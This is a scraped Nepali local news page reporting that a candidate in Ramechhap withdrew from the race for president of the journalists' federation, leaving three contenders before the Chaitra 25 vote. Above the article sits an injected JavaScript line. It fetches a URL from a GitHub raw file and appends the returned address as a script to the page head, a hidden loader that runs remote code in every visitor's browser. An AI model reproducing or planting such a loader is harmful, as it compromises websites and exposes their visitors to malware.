;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत्र २३
रामेछाप ।स्वतन्त्र उम्मेदवारी दिएका नवीन घिमिरेले आफ्नाे उम्मेदवारी फिर्ता लिएका छन् । प्रेस युनियनका सदस्यसमेत रहेका घिमिरेले आइतबार आसन्न पत्रकार महासंघको चुनावमा अध्यक्षकाे लागि स्वतन्त्र उम्मेदवारी दर्ता गराएका थिए ।
साेमबार युनियनका पदादिकारी सहित महासंघकाे लागि युनियन र प्रेस संगठनका संयुक्त प्यानल तर्फका अध्यक्ष बद्री नयाँघरे सहितकाे टाेलीसंगकाे छलफलपछि घिमिरेले सहमतिकाे आधरमा उम्मेदवारी फिर्ता लिएका हुन् । याेसंगै अब रामेछापमा तीन जना अध्यक्षबीच अध्यक्ष पदकाे लागि प्रतिस्पर्धा हुने देखिएकाे छ । जसमा संयुक्त प्यानलबाट नयाँघरे, प्रेस चाैतारीका उम्मेदवार साैजन्य सत्याल र स्वतन्त्र उम्मेदवारी दिएका सुमित श्रेष्ठ रहेका छन् । चाैचारी र युनियनकाे अहिले कसरी अगाडि बढ्ने भन्ने विषयमा बार्ता जारी छ । महासंघको चुनाव चैत्र २५ गते हुँदै छ ।
फेसबुक प्रतिक्रियाहरु